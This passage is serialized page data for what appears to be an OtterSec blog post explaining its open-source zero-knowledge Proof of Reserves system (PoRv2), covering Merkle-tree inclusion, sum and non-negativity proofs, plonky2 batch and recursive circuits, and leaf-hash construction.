Zero-Knowledge Proof allows one party to prove to another that a statement is true without revealing any information beyond the validity of the statement itself. Imagine proving you know a secret password without actually telling anyone the password. You confirm you possess the knowledge, but the secret remains yours.",{"type":27,"tag":36,"props":99806,"children":99807},{},[99808],{"type":33,"value":99809},"In the context of Proof of Reserves, ZKPs are perfectly suited to solve the privacy paradox. They enable a platform to prove two important things cryptographically:",{"type":27,"tag":12719,"props":99811,"children":99812},{},[99813,99830],{"type":27,"tag":1232,"props":99814,"children":99815},{},[99816,99821,99823,99829],{"type":27,"tag":12606,"props":99817,"children":99818},{},[99819],{"type":33,"value":99820},"Sum proof",{"type":33,"value":99822},": The exchange liability is equal to the sum of all users' balances. (e.g: ",{"type":27,"tag":84,"props":99824,"children":99826},{"className":99825},[],[99827],{"type":33,"value":99828},"btc_liability = user1_btc + user2_btc + user3_btc + ...",{"type":33,"value":28014},{"type":27,"tag":1232,"props":99831,"children":99832},{},[99833,99838,99840,99845],{"type":27,"tag":12606,"props":99834,"children":99835},{},[99836],{"type":33,"value":99837},"Non-negativity",{"type":33,"value":99839},": All users have a ",{"type":27,"tag":12606,"props":99841,"children":99842},{},[99843],{"type":33,"value":99844},"positive",{"type":33,"value":99846}," net balance. This ensures that the sum proof is not tampered with by users with negative net balances. A user can have negative asset balances (e.g., borrowing BTC) but only if collateralized with other assets.",{"type":27,"tag":36,"props":99848,"children":99849},{},[99850],{"type":33,"value":99851},"It is worth noting that we cannot guarantee that all users were included in the ZK analysis. Therefore, if we only used ZKPs to prove those two statements, the exchange could tamper with the sum proof by excluding users from the PoR. That's why we also use a Merkle tree to prove inclusions.",{"type":27,"tag":28,"props":99853,"children":99855},{"id":99854},"what-is-a-merkle-tree-and-how-does-it-help-in-a-por",[99856],{"type":33,"value":99857},"What is a Merkle Tree and how does it help in a PoR?",{"type":27,"tag":36,"props":99859,"children":99860},{},[99861],{"type":33,"value":99862},"A Merkle tree is a tree data structure where each leaf node is a cryptographic hash of an individual piece of data (like a user's balance), and every non-leaf node is a cryptographic hash of its child nodes. This structure allows for the entire dataset to be summarized by a single, unique hash at the top, called the Merkle Root.",{"type":27,"tag":36,"props":99864,"children":99865},{},[99866],{"type":27,"tag":126,"props":99867,"children":99869},{"alt":57817,"src":99868},"/posts/por/merkle-tree.png",[],{"type":27,"tag":36,"props":99871,"children":99872},{},[99873],{"type":33,"value":99874},"In the PoR, we can use a Merkle tree to verify the inclusion of each user in the Proof of Reserves. It works like this:",{"type":27,"tag":12719,"props":99876,"children":99877},{},[99878,99891,99896],{"type":27,"tag":1232,"props":99879,"children":99880},{},[99881,99883,99889],{"type":33,"value":99882},"The Merkle tree is generated using the leaf nodes as the hashes of the user information (e.g., ",{"type":27,"tag":84,"props":99884,"children":99886},{"className":99885},[],[99887],{"type":33,"value":99888},"sha256({id: 1, balances: {\"BTC\": 0.1, \"ETH\": 0.2, ...}})",{"type":33,"value":99890},");",{"type":27,"tag":1232,"props":99892,"children":99893},{},[99894],{"type":33,"value":99895},"The Merkle tree is made public;",{"type":27,"tag":1232,"props":99897,"children":99898},{},[99899],{"type":33,"value":99900},"Each user can download the Merkle tree and check if their account was included by hashing their account information and checking if the hash is one of the leaves;",{"type":27,"tag":36,"props":99902,"children":99903},{},[99904],{"type":33,"value":99905},"In other words, this use of the Merkle tree allows users to easily verify that their individual balance was included in the overall total.",{"type":27,"tag":28,"props":99907,"children":99909},{"id":99908},"ottersec-porv2",[99910],{"type":33,"value":99911},"OtterSec PoRv2",{"type":27,"tag":36,"props":99913,"children":99914},{},[99915,99921,99923,99930],{"type":27,"tag":47,"props":99916,"children":99918},{"href":99752,"rel":99917},[51],[99919],{"type":33,"value":99920},"We just open-sourced our Proof of Reserves code (PoRv2)",{"type":33,"value":99922},", which uses the ",{"type":27,"tag":47,"props":99924,"children":99927},{"href":99925,"rel":99926},"https://github.com/0xPolygonZero/plonky2",[51],[99928],{"type":33,"value":99929},"plonky2 ZK algorithm",{"type":33,"value":99931}," to create a Merkle tree and a final ZK proof that recursively verifies smaller sum and non-negativity proofs.",{"type":27,"tag":36,"props":99933,"children":99934},{},[99935,99937,99944],{"type":33,"value":99936},"We named it PoRv2 because we already had a version based on ",{"type":27,"tag":47,"props":99938,"children":99941},{"href":99939,"rel":99940},"https://vitalik.eth.limo/general/2022/11/19/proof_of_solvency.html",[51],[99942],{"type":33,"value":99943},"Vitalik's proof of solvency",{"type":33,"value":99945},", which was not optimal.",{"type":27,"tag":36,"props":99947,"children":99948},{},[99949],{"type":27,"tag":12606,"props":99950,"children":99951},{},[99952],{"type":33,"value":99953},"Non-negativity Proof",{"type":27,"tag":36,"props":99955,"children":99956},{},[99957],{"type":33,"value":99958},"In our non-negativity proof, the circuit receives the asset balances of each user and the price of each asset. With these inputs, it calculates the account's USD balance and checks if it is greater than 0.",{"type":27,"tag":36,"props":99960,"children":99961},{},[99962],{"type":33,"value":99963},"We also check for overflows during summation to prevent tampering in the final result.",{"type":27,"tag":36,"props":99965,"children":99966},{},[99967],{"type":27,"tag":12606,"props":99968,"children":99969},{},[99970],{"type":33,"value":99971},"Sum Proof",{"type":27,"tag":36,"props":99973,"children":99974},{},[99975,99977,99983],{"type":33,"value":99976},"The sum proof verifies a public circuit input that was calculated by summing up all user balances of each asset. (e.g., ",{"type":27,"tag":84,"props":99978,"children":99980},{"className":99979},[],[99981],{"type":33,"value":99982},"BTC final: user1_btc + user2_btc ...",{"type":33,"value":99984},"). Note that each asset's final sum is not USD-based; we calculate the final balance using the asset balance itself.",{"type":27,"tag":58,"props":99986,"children":99988},{"id":99987},"what-are-the-ottersec-porv2-key-points",[99989],{"type":33,"value":99990},"What are the OtterSec PoRv2 key points?",{"type":27,"tag":12719,"props":99992,"children":99993},{},[99994,100004,100022,100032,100063],{"type":27,"tag":1232,"props":99995,"children":99996},{},[99997,100002],{"type":27,"tag":12606,"props":99998,"children":99999},{},[100000],{"type":33,"value":100001},"Transparency",{"type":33,"value":100003},": It is possible for the exchange to safely disclose the entire Merkle tree so users can verify it without the need for an external auditing company. Also, the code allows asset price commitments and verifications.",{"type":27,"tag":1232,"props":100005,"children":100006},{},[100007,100012,100014,100021],{"type":27,"tag":12606,"props":100008,"children":100009},{},[100010],{"type":33,"value":100011},"Time-efficiency",{"type":33,"value":100013},": We were able to reduce the amount of time to prove by more than 100 times from our previous version by generating proofs for 750,000 users within 8 minutes using a Mac M3 Pro. ",{"type":27,"tag":47,"props":100015,"children":100018},{"href":100016,"rel":100017},"https://github.com/otter-sec/por_v2?tab=readme-ov-file#benchmark",[51],[100019],{"type":33,"value":100020},"Check our benchmark",{"type":33,"value":1041},{"type":27,"tag":1232,"props":100023,"children":100024},{},[100025,100030],{"type":27,"tag":12606,"props":100026,"children":100027},{},[100028],{"type":33,"value":100029},"Memory-efficiency",{"type":33,"value":100031},": We also were able to reduce the amount of RAM needed to prove the liabilities of millions of users. Now, we are able to use machines with 16GB.",{"type":27,"tag":1232,"props":100033,"children":100034},{},[100035,100040,100042,100047,100049,100054,100056,100061],{"type":27,"tag":12606,"props":100036,"children":100037},{},[100038],{"type":33,"value":100039},"Small-proofs",{"type":33,"value":100041},": We were able to reduce the final proof to less than ",{"type":27,"tag":12606,"props":100043,"children":100044},{},[100045],{"type":33,"value":100046},"500KB",{"type":33,"value":100048}," and each inclusion proof to ",{"type":27,"tag":12606,"props":100050,"children":100051},{},[100052],{"type":33,"value":100053},"~52KB",{"type":33,"value":100055},". The only big file that we need to store is the Merkle tree, which doesn't consume more than ",{"type":27,"tag":12606,"props":100057,"children":100058},{},[100059],{"type":33,"value":100060},"200MB",{"type":33,"value":100062}," if the PoR parameters are finely adjusted. Additionally, instead of storing each inclusion proof in a static file, we provide an efficient method to generate inclusion proofs on demand, eliminating the need for the exchange to store millions of files and conserve disk space and resources.",{"type":27,"tag":1232,"props":100064,"children":100065},{},[100066,100071],{"type":27,"tag":12606,"props":100067,"children":100068},{},[100069],{"type":33,"value":100070},"Privacy",{"type":33,"value":100072},": We use many cryptographic mechanisms to ensure that the user balances and other private information are kept safe and secret.",{"type":27,"tag":28,"props":100074,"children":100076},{"id":100075},"zk-circuits",[100077],{"type":33,"value":100078},"ZK Circuits",{"type":27,"tag":36,"props":100080,"children":100081},{},[100082],{"type":33,"value":100083},"We use two different ZK circuits to generate the final proof:",{"type":27,"tag":12719,"props":100085,"children":100086},{},[100087,100092],{"type":27,"tag":1232,"props":100088,"children":100089},{},[100090],{"type":33,"value":100091},"Batch circuit",{"type":27,"tag":1232,"props":100093,"children":100094},{},[100095],{"type":33,"value":100096},"Recursive circuit",{"type":27,"tag":36,"props":100098,"children":100099},{},[100100],{"type":33,"value":100101},"With those two circuits, we can generate the proofs recursive tree:",{"type":27,"tag":36,"props":100103,"children":100104},{},[100105],{"type":27,"tag":126,"props":100106,"children":100108},{"alt":57817,"src":100107},"/posts/por/batch-circuit.png",[],{"type":27,"tag":10222,"props":100110,"children":100111},{},[100112],{"type":27,"tag":36,"props":100113,"children":100114},{},[100115,100117,100123,100125,100131],{"type":33,"value":100116},"Note: We are using 512 as ",{"type":27,"tag":84,"props":100118,"children":100120},{"className":100119},[],[100121],{"type":33,"value":100122},"BATCH_SIZE",{"type":33,"value":100124}," and 8 as ",{"type":27,"tag":84,"props":100126,"children":100128},{"className":100127},[],[100129],{"type":33,"value":100130},"RECURSIVE_SIZE",{"type":33,"value":100132}," which indicates how many children each circuit has. This is easily adjustable in the code, and the optimal configuration will depend on the amount of accounts being proved in the PoR.",{"type":27,"tag":10222,"props":100134,"children":100135},{},[100136],{"type":27,"tag":36,"props":100137,"children":100138},{},[100139],{"type":33,"value":100140},"Note 2: We add empty proofs as padding to chunks that don't have the correct length.",{"type":27,"tag":36,"props":100142,"children":100143},{},[100144],{"type":33,"value":100145},"Each non-leaf node in this tree is a ZK proof, which is generated using the related circuit; each circuit also generates the Merkle tree hash of each node, which is included in the Merkle tree.",{"type":27,"tag":58,"props":100147,"children":100149},{"id":100148},"leaf-nodes",[100150],{"type":33,"value":100151},"Leaf Nodes",{"type":27,"tag":36,"props":100153,"children":100154},{},[100155],{"type":33,"value":100156},"The leaf nodes are the hashes of the account information. It is calculated in this way:",{"type":27,"tag":36,"props":100158,"children":100159},{},[100160],{"type":27,"tag":84,"props":100161,"children":100163},{"className":100162},[11266,11267],[100164],{"type":27,"tag":207,"props":100165,"children":100167},{"className":100166},[11272],[100168],{"type":27,"tag":207,"props":100169,"children":100171},{"className":100170,"ariaHidden":11278},[11277],[100172,100199],{"type":27,"tag":207,"props":100173,"children":100175},{"className":100174},[11283],[100176,100181,100186,100190,100195],{"type":27,"tag":207,"props":100177,"children":100180},{"className":100178,"style":100179},[11288],"height:0.6944em;",[],{"type":27,"tag":207,"props":100182,"children":100184},{"className":100183},[11294,28860],[100185],{"type":33,"value":91568},{"type":27,"tag":207,"props":100187,"children":100189},{"className":100188,"style":11470},[11372],[],{"type":27,"tag":207,"props":100191,"children":100193},{"className":100192},[11475],[100194],{"type":33,"value":10380},{"type":27,"tag":207,"props":100196,"children":100198},{"className":100197,"style":11470},[11372],[],{"type":27,"tag":207,"props":100200,"children":100202},{"className":100201},[11283],[100203,100208,100213,100219,100224,100229,100235,100240,100245,100250,100256,100261,100267,100273,100280,100286,100292,100352,100357,100363,100368,100373,100378,100383,100388,100393,100398,100403,100408,100465,100470,100475,100480,100485,100490,100495,100502,100507,100513,100518,100524,100530,100535,100540,100545,100550,100555,100560,100565,100570,100575,100580,100585,100590,100595,100600],{"type":27,"tag":207,"props":100204,"children":100207},{"className":100205,"style":100206},[11288],"height:1.06em;vertical-align:-0.31em;",[],{"type":27,"tag":207,"props":100209,"children":100211},{"className":100210,"style":28861},[11294,28860],[100212],{"type":33,"value":28864},{"type":27,"tag":207,"props":100214,"children":100216},{"className":100215},[11294,28860],[100217],{"type":33,"value":100218},"ose",{"type":27,"tag":207,"props":100220,"children":100222},{"className":100221},[11294,28860],[100223],{"type":33,"value":4690},{"type":27,"tag":207,"props":100225,"children":100227},{"className":100226},[11294,28860],[100228],{"type":33,"value":77797},{"type":27,"tag":207,"props":100230,"children":100232},{"className":100231},[11294,28860],[100233],{"type":33,"value":100234},"o",{"type":27,"tag":207,"props":100236,"children":100238},{"className":100237},[11294,28860],[100239],{"type":33,"value":63637},{"type":27,"tag":207,"props":100241,"children":100243},{"className":100242},[28989],[100244],{"type":33,"value":1343},{"type":27,"tag":207,"props":100246,"children":100248},{"className":100247},[11294,28860],[100249],{"type":33,"value":47},{"type":27,"tag":207,"props":100251,"children":100253},{"className":100252},[11294,28860],[100254],{"type":33,"value":100255},"sse",{"type":27,"tag":207,"props":100257,"children":100259},{"className":100258},[11294,28860],[100260],{"type":33,"value":29002},{"type":27,"tag":207,"props":100262,"children":100265},{"className":100263,"style":100264},[11294],"margin-right:0.02778em;",[100266],{"type":33,"value":10371},{"type":27,"tag":207,"props":100268,"children":100270},{"className":100269},[11294,28860],[100271],{"type":33,"value":100272},"ba",{"type":27,"tag":207,"props":100274,"children":100277},{"className":100275,"style":100276},[11294,28860],"margin-right:0.01968em;",[100278],{"type":33,"value":100279},"l",{"type":27,"tag":207,"props":100281,"children":100283},{"className":100282},[11294,28860],[100284],{"type":33,"value":100285},"an",{"type":27,"tag":207,"props":100287,"children":100289},{"className":100288},[11294,28860],[100290],{"type":33,"value":100291},"ce",{"type":27,"tag":207,"props":100293,"children":100295},{"className":100294},[11294],[100296,100301],{"type":27,"tag":207,"props":100297,"children":100299},{"className":100298},[11294,28860],[100300],{"type":33,"value":17929},{"type":27,"tag":207,"props":100302,"children":100304},{"className":100303},[11309],[100305],{"type":27,"tag":207,"props":100306,"children":100308},{"className":100307},[11314,28914],[100309,100340],{"type":27,"tag":207,"props":100310,"children":100312},{"className":100311},[11319],[100313,100335],{"type":27,"tag":207,"props":100314,"children":100317},{"className":100315,"style":100316},[11324],"height:0.3011em;",[100318],{"type":27,"tag":207,"props":100319,"children":100321},{"style":100320},"top:-2.55em;margin-left:0em;margin-right:0.05em;",[100322,100326],{"type":27,"tag":207,"props":100323,"children":100325},{"className":100324,"style":11334},[11333],[],{"type":27,"tag":207,"props":100327,"children":100329},{"className":100328},[11339,11340,11341,11342],[100330],{"type":27,"tag":207,"props":100331,"children":100333},{"className":100332},[11294,11342],[100334],{"type":33,"value":1660},{"type":27,"tag":207,"props":100336,"children":100338},{"className":100337},[29017],[100339],{"type":33,"value":29020},{"type":27,"tag":207,"props":100341,"children":100343},{"className":100342},[11319],[100344],{"type":27,"tag":207,"props":100345,"children":100348},{"className":100346,"style":100347},[11324],"height:0.15em;",[100349],{"type":27,"tag":207,"props":100350,"children":100351},{},[],{"type":27,"tag":207,"props":100353,"children":100355},{"className":100354},[11372],[100356],{"type":33,"value":28961},{"type":27,"tag":207,"props":100358,"children":100360},{"className":100359},[11294],[100361],{"type":33,"value":100362},"∣∣",{"type":27,"tag":207,"props":100364,"children":100366},{"className":100365},[11372],[100367],{"type":33,"value":28961},{"type":27,"tag":207,"props":100369,"children":100371},{"className":100370},[11294,28860],[100372],{"type":33,"value":47},{"type":27,"tag":207,"props":100374,"children":100376},{"className":100375},[11294,28860],[100377],{"type":33,"value":100255},{"type":27,"tag":207,"props":100379,"children":100381},{"className":100380},[11294,28860],[100382],{"type":33,"value":29002},{"type":27,"tag":207,"props":100384,"children":100386},{"className":100385,"style":100264},[11294],[100387],{"type":33,"value":10371},{"type":27,"tag":207,"props":100389,"children":100391},{"className":100390},[11294,28860],[100392],{"type":33,"value":100272},{"type":27,"tag":207,"props":100394,"children":100396},{"className":100395,"style":100276},[11294,28860],[100397],{"type":33,"value":100279},{"type":27,"tag":207,"props":100399,"children":100401},{"className":100400},[11294,28860],[100402],{"type":33,"value":100285},{"type":27,"tag":207,"props":100404,"children":100406},{"className":100405},[11294,28860],[100407],{"type":33,"value":100291},{"type":27,"tag":207,"props":100409,"children":100411},{"className":100410},[11294],[100412,100417],{"type":27,"tag":207,"props":100413,"children":100415},{"className":100414},[11294,28860],[100416],{"type":33,"value":17929},{"type":27,"tag":207,"props":100418,"children":100420},{"className":100419},[11309],[100421],{"type":27,"tag":207,"props":100422,"children":100424},{"className":100423},[11314,28914],[100425,100454],{"type":27,"tag":207,"props":100426,"children":100428},{"className":100427},[11319],[100429,100449],{"type":27,"tag":207,"props":100430,"children":100432},{"className":100431,"style":100316},[11324],[100433],{"type":27,"tag":207,"props":100434,"children":100435},{"style":100320},[100436,100440],{"type":27,"tag":207,"props":100437,"children":100439},{"className":100438,"style":11334},[11333],[],{"type":27,"tag":207,"props":100441,"children":100443},{"className":100442},[11339,11340,11341,11342],[100444],{"type":27,"tag":207,"props":100445,"children":100447},{"className":100446},[11294,11342],[100448],{"type":33,"value":1651},{"type":27,"tag":207,"props":100450,"children":100452},{"className":100451},[29017],[100453],{"type":33,"value":29020},{"type":27,"tag":207,"props":100455,"children":100457},{"className":100456},[11319],[100458],{"type":27,"tag":207,"props":100459,"children":100461},{"className":100460,"style":100347},[11324],[100462],{"type":27,"tag":207,"props":100463,"children":100464},{},[],{"type":27,"tag":207,"props":100466,"children":100468},{"className":100467},[11372],[100469],{"type":33,"value":28961},{"type":27,"tag":207,"props":100471,"children":100473},{"className":100472},[11294],[100474],{"type":33,"value":16867},{"type":27,"tag":207,"props":100476,"children":100478},{"className":100477},[11372],[100479],{"type":33,"value":28961},{"type":27,"tag":207,"props":100481,"children":100483},{"className":100482},[11294],[100484],{"type":33,"value":100362},{"type":27,"tag":207,"props":100486,"children":100488},{"className":100487},[11372],[100489],{"type":33,"value":28961},{"type":27,"tag":207,"props":100491,"children":100493},{"className":100492,"style":29319},[11294,28860],[100494],{"type":33,"value":29322},{"type":27,"tag":207,"props":100496,"children":100499},{"className":100497,"style":100498},[11294,28860],"margin-right:0.08125em;",[100500],{"type":33,"value":100501},"H",{"type":27,"tag":207,"props":100503,"children":100505},{"className":100504},[11294,28860],[100506],{"type":33,"value":83998},{"type":27,"tag":207,"props":100508,"children":100510},{"className":100509},[11294],[100511],{"type":33,"value":100512},"256",{"type":27,"tag":207,"props":100514,"children":100516},{"className":100515},[28989],[100517],{"type":33,"value":1343},{"type":27,"tag":207,"props":100519,"children":100521},{"className":100520},[11294,28860],[100522],{"type":33,"value":100523},"u",{"type":27,"tag":207,"props":100525,"children":100527},{"className":100526,"style":100264},[11294,28860],[100528],{"type":33,"value":100529},"ser",{"type":27,"tag":207,"props":100531,"children":100533},{"className":100532,"style":100264},[11294],[100534],{"type":33,"value":10371},{"type":27,"tag":207,"props":100536,"children":100538},{"className":100537},[11294,28860],[100539],{"type":33,"value":4690},{"type":27,"tag":207,"props":100541,"children":100543},{"className":100542},[11294,28860],[100544],{"type":33,"value":77797},{"type":27,"tag":207,"props":100546,"children":100548},{"className":100547},[29011],[100549],{"type":33,"value":10416},{"type":27,"tag":207,"props":100551,"children":100553},{"className":100552},[11372],[100554],{"type":33,"value":28961},{"type":27,"tag":207,"props":100556,"children":100558},{"className":100557},[11294],[100559],{"type":33,"value":100362},{"type":27,"tag":207,"props":100561,"children":100563},{"className":100562},[11372],[100564],{"type":33,"value":28961},{"type":27,"tag":207,"props":100566,"children":100568},{"className":100567},[11294,28860],[100569],{"type":33,"value":100523},{"type":27,"tag":207,"props":100571,"children":100573},{"className":100572,"style":100264},[11294,28860],[100574],{"type":33,"value":100529},{"type":27,"tag":207,"props":100576,"children":100578},{"className":100577,"style":100264},[11294],[100579],{"type":33,"value":10371},{"type":27,"tag":207,"props":100581,"children":100583},{"className":100582},[11294,28860],[100584],{"type":33,"value":63637},{"type":27,"tag":207,"props":100586,"children":100588},{"className":100587},[11294,28860],[100589],{"type":33,"value":100234},{"type":27,"tag":207,"props":100591,"children":100593},{"className":100592},[11294,28860],[100594],{"type":33,"value":63637},{"type":27,"tag":207,"props":100596,"children":100598},{"className":100597},[11294,28860],[100599],{"type":33,"value":100291},{"type":27,"tag":207,"props":100601,"children":100603},{"className":100602},[29011],[100604],{"type":33,"value":10416},{"type":27,"tag":36,"props":100606,"children":100607},{},[100608,100610,100616],{"type":33,"value":100609},"In other words, all balances are concatenated with the hashed user ID (which can be a ",{"type":27,"tag":84,"props":100611,"children":100613},{"className":100612},[],[100614],{"type":33,"value":100615},"uuid",{"type":33,"value":100617},", a username or an incremental ID) and with a nonce. The nonce is a random number that serves as a security measure against attackers who could brute-force the hash to find out other users' balances. Since the Merkle tree is a public proof, we need to be careful against these types of data leaks.",{"type":27,"tag":58,"props":100619,"children":100621},{"id":100620},"batch-circuit",[100622],{"type":33,"value":100623},"Batch Circuit",{"type":27,"tag":36,"props":100625,"children":100626},{},[100627],{"type":33,"value":100628},"The batch circuit is the first proven circuit in the PoR algorithm. It receives the account's information (grouped in 512) and generates the ZK proof with those constraints:",{"type":27,"tag":36,"props":100630,"children":100631},{},[100632],{"type":27,"tag":12606,"props":100633,"children":100634},{},[100635],{"type":33,"value":100636},"Public Inputs",{"type":27,"tag":1228,"props":100638,"children":100639},{},[100640,100645,100650],{"type":27,"tag":1232,"props":100641,"children":100642},{},[100643],{"type":33,"value":100644},"Asset prices in USD",{"type":27,"tag":1232,"props":100646,"children":100647},{},[100648],{"type":33,"value":100649},"Merkle tree hash",{"type":27,"tag":1232,"props":100651,"children":100652},{},[100653],{"type":33,"value":100654},"Summed asset balances",{"type":27,"tag":36,"props":100656,"children":100657},{},[100658],{"type":27,"tag":12606,"props":100659,"children":100660},{},[100661],{"type":33,"value":100662},"Private Inputs",{"type":27,"tag":1228,"props":100664,"children":100665},{},[100666,100671],{"type":27,"tag":1232,"props":100667,"children":100668},{},[100669],{"type":33,"value":100670},"Users balances",{"type":27,"tag":1232,"props":100672,"children":100673},{},[100674],{"type":33,"value":100675},"Merkle tree leaves hashes",{"type":27,"tag":36,"props":100677,"children":100678},{},[100679],{"type":27,"tag":12606,"props":100680,"children":100681},{},[100682],{"type":33,"value":100683},"Constraints",{"type":27,"tag":1228,"props":100685,"children":100686},{},[100687,101140,101308,101655,102053],{"type":27,"tag":1232,"props":100688,"children":100689},{},[100690],{"type":27,"tag":84,"props":100691,"children":100693},{"className":100692},[11266,11267],[100694],{"type":27,"tag":207,"props":100695,"children":100697},{"className":100696},[11272],[100698],{"type":27,"tag":207,"props":100699,"children":100701},{"className":100700,"ariaHidden":11278},[11277],[100702,100841,101045],{"type":27,"tag":207,"props":100703,"children":100705},{"className":100704},[11283],[100706,100711,100716,100722,100727,100732,100737,100742,100747,100754,100759,100764,100769,100828,100832,100837],{"type":27,"tag":207,"props":100707,"children":100710},{"className":100708,"style":100709},[11288],"height:0.9695em;vertical-align:-0.31em;",[],{"type":27,"tag":207,"props":100712,"children":100714},{"className":100713},[11294,28860],[100715],{"type":33,"value":47},{"type":27,"tag":207,"props":100717,"children":100719},{"className":100718},[11294,28860],[100720],{"type":33,"value":100721},"cco",{"type":27,"tag":207,"props":100723,"children":100725},{"className":100724},[11294,28860],[100726],{"type":33,"value":100523},{"type":27,"tag":207,"props":100728,"children":100730},{"className":100729},[11294,28860],[100731],{"type":33,"value":63637},{"type":27,"tag":207,"props":100733,"children":100735},{"className":100734},[11294,28860],[100736],{"type":33,"value":29002},{"type":27,"tag":207,"props":100738,"children":100740},{"className":100739,"style":100264},[11294],[100741],{"type":33,"value":10371},{"type":27,"tag":207,"props":100743,"children":100745},{"className":100744},[11294,28860],[100746],{"type":33,"value":1419},{"type":27,"tag":207,"props":100748,"children":100751},{"className":100749,"style":100750},[11294,28860],"margin-right:0.03588em;",[100752],{"type":33,"value":100753},"q",{"type":27,"tag":207,"props":100755,"children":100757},{"className":100756},[11294,28860],[100758],{"type":33,"value":100523},{"type":27,"tag":207,"props":100760,"children":100762},{"className":100761},[11294,28860],[100763],{"type":33,"value":4690},{"type":27,"tag":207,"props":100765,"children":100767},{"className":100766},[11294,28860],[100768],{"type":33,"value":29002},{"type":27,"tag":207,"props":100770,"children":100772},{"className":100771},[11294],[100773,100778],{"type":27,"tag":207,"props":100774,"children":100776},{"className":100775,"style":100750},[11294,28860],[100777],{"type":33,"value":10403},{"type":27,"tag":207,"props":100779,"children":100781},{"className":100780},[11309],[100782],{"type":27,"tag":207,"props":100783,"children":100785},{"className":100784},[11314,28914],[100786,100817],{"type":27,"tag":207,"props":100787,"children":100789},{"className":100788},[11319],[100790,100812],{"type":27,"tag":207,"props":100791,"children":100794},{"className":100792,"style":100793},[11324],"height:0.3117em;",[100795],{"type":27,"tag":207,"props":100796,"children":100798},{"style":100797},"top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;",[100799,100803],{"type":27,"tag":207,"props":100800,"children":100802},{"className":100801,"style":11334},[11333],[],{"type":27,"tag":207,"props":100804,"children":100806},{"className":100805},[11339,11340,11341,11342],[100807],{"type":27,"tag":207,"props":100808,"children":100810},{"className":100809},[11294,28860,11342],[100811],{"type":33,"value":4690},{"type":27,"tag":207,"props":100813,"children":100815},{"className":100814},[29017],[100816],{"type":33,"value":29020},{"type":27,"tag":207,"props":100818,"children":100820},{"className":100819},[11319],[100821],{"type":27,"tag":207,"props":100822,"children":100824},{"className":100823,"style":100347},[11324],[100825],{"type":27,"tag":207,"props":100826,"children":100827},{},[],{"type":27,"tag":207,"props":100829,"children":100831},{"className":100830,"style":11470},[11372],[],{"type":27,"tag":207,"props":100833,"children":100835},{"className":100834},[11475],[100836],{"type":33,"value":15856},{"type":27,"tag":207,"props":100838,"children":100840},{"className":100839,"style":11470},[11372],[],{"type":27,"tag":207,"props":100842,"children":100844},{"className":100843},[11283],[100845,100849,100855,100860,100865,100870,100875,100880,100885,100890,100895,100900,100905,100910,100915,100920,100925,100930,100987,100992,100997,101002,101007,101012,101017,101022,101027,101032,101036,101041],{"type":27,"tag":207,"props":100846,"children":100848},{"className":100847,"style":100206},[11288],[],{"type":27,"tag":207,"props":100850,"children":100852},{"className":100851},[11294],[100853],{"type":33,"value":100854},"Σ",{"type":27,"tag":207,"props":100856,"children":100858},{"className":100857},[11372],[100859],{"type":33,"value":28961},{"type":27,"tag":207,"props":100861,"children":100863},{"className":100862},[11294,28860],[100864],{"type":33,"value":47},{"type":27,"tag":207,"props":100866,"children":100868},{"className":100867},[11294,28860],[100869],{"type":33,"value":100721},{"type":27,"tag":207,"props":100871,"children":100873},{"className":100872},[11294,28860],[100874],{"type":33,"value":100523},{"type":27,"tag":207,"props":100876,"children":100878},{"className":100877},[11294,28860],[100879],{"type":33,"value":63637},{"type":27,"tag":207,"props":100881,"children":100883},{"className":100882},[11294,28860],[100884],{"type":33,"value":29002},{"type":27,"tag":207,"props":100886,"children":100888},{"className":100887,"style":100264},[11294],[100889],{"type":33,"value":10371},{"type":27,"tag":207,"props":100891,"children":100893},{"className":100892},[11294,28860],[100894],{"type":33,"value":47},{"type":27,"tag":207,"props":100896,"children":100898},{"className":100897},[11294,28860],[100899],{"type":33,"value":100255},{"type":27,"tag":207,"props":100901,"children":100903},{"className":100902},[11294,28860],[100904],{"type":33,"value":29002},{"type":27,"tag":207,"props":100906,"children":100908},{"className":100907,"style":100264},[11294],[100909],{"type":33,"value":10371},{"type":27,"tag":207,"props":100911,"children":100913},{"className":100912},[11294,28860],[100914],{"type":33,"value":100272},{"type":27,"tag":207,"props":100916,"children":100918},{"className":100917,"style":100276},[11294,28860],[100919],{"type":33,"value":100279},{"type":27,"tag":207,"props":100921,"children":100923},{"className":100922},[11294,28860],[100924],{"type":33,"value":100285},{"type":27,"tag":207,"props":100926,"children":100928},{"className":100927},[11294,28860],[100929],{"type":33,"value":100291},{"type":27,"tag":207,"props":100931,"children":100933},{"className":100932},[11294],[100934,100939],{"type":27,"tag":207,"props":100935,"children":100937},{"className":100936},[11294,28860],[100938],{"type":33,"value":17929},{"type":27,"tag":207,"props":100940,"children":100942},{"className":100941},[11309],[100943],{"type":27,"tag":207,"props":100944,"children":100946},{"className":100945},[11314,28914],[100947,100976],{"type":27,"tag":207,"props":100948,"children":100950},{"className":100949},[11319],[100951,100971],{"type":27,"tag":207,"props":100952,"children":100954},{"className":100953,"style":100793},[11324],[100955],{"type":27,"tag":207,"props":100956,"children":100957},{"style":100320},[100958,100962],{"type":27,"tag":207,"props":100959,"children":100961},{"className":100960,"style":11334},[11333],[],{"type":27,"tag":207,"props":100963,"children":100965},{"className":100964},[11339,11340,11341,11342],[100966],{"type":27,"tag":207,"props":100967,"children":100969},{"className":100968},[11294,28860,11342],[100970],{"type":33,"value":4690},{"type":27,"tag":207,"props":100972,"children":100974},{"className":100973},[29017],[100975],{"type":33,"value":29020},{"type":27,"tag":207,"props":100977,"children":100979},{"className":100978},[11319],[100980],{"type":27,"tag":207,"props":100981,"children":100983},{"className":100982,"style":100347},[11324],[100984],{"type":27,"tag":207,"props":100985,"children":100986},{},[],{"type":27,"tag":207,"props":100988,"children":100990},{"className":100989},[28989],[100991],{"type":33,"value":11019},{"type":27,"tag":207,"props":100993,"children":100995},{"className":100994},[11294,28860],[100996],{"type":33,"value":47},{"type":27,"tag":207,"props":100998,"children":101000},{"className":100999},[11294,28860],[101001],{"type":33,"value":100255},{"type":27,"tag":207,"props":101003,"children":101005},{"className":101004},[11294,28860],[101006],{"type":33,"value":29002},{"type":27,"tag":207,"props":101008,"children":101010},{"className":101009,"style":100264},[11294],[101011],{"type":33,"value":10371},{"type":27,"tag":207,"props":101013,"children":101015},{"className":101014},[11294,28860],[101016],{"type":33,"value":63637},{"type":27,"tag":207,"props":101018,"children":101020},{"className":101019},[11294,28860],[101021],{"type":33,"value":100523},{"type":27,"tag":207,"props":101023,"children":101025},{"className":101024},[11294,28860],[101026],{"type":33,"value":58372},{"type":27,"tag":207,"props":101028,"children":101030},{"className":101029},[29011],[101031],{"type":33,"value":22686},{"type":27,"tag":207,"props":101033,"children":101